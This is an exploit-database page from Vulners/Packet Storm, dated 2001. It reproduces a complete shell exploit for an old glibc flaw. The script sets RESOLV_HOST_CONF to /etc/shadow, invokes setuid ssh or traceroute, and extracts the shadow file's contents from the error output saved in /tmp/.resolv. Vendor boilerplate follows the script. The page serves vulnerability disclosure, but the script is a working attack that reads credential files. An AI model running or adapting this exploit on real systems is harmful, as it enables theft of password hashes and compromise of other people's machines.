Lucene search
K

glibc-resolve-tr.sh

🗓️ 27 Jan 2001 00:00:00Reported by Charles StevensonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Exploit glibc vulnerability by reading sensitive data from /etc/shadow file using SSH.

Code
`# Charles Stevenson <[email protected]>  
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)  
# This exploits is for glibc >= 2.1.9x.  
# (****[email protected]****)  
# Edit this if you have a problem with path  
  
ssh=/usr/bin/ssh  
traceroute=/usr/sbin/traceroute  
FILE=/etc/shadow # File to read  
###############################################################################  
  
echo "$ssh"  
echo "[*] Checking permisions..."  
  
if [ ! -u $ssh ]; then  
echo "$ssh is NOT setuid on this system or does not exist at all!"  
if [ ! -u $traceroute ]; then  
echo "$traceroute is NOT setuid on this system or does not exist at all!"  
exit 0  
fi  
fi  
  
export RESOLV_HOST_CONF=$FILE  
  
echo "[*] Glibc bug found by Charles Stevenson <[email protected]>"  
echo "[*] [email protected]"  
sleep 1  
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"  
ssh lt 2>/tmp/.resolv  
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation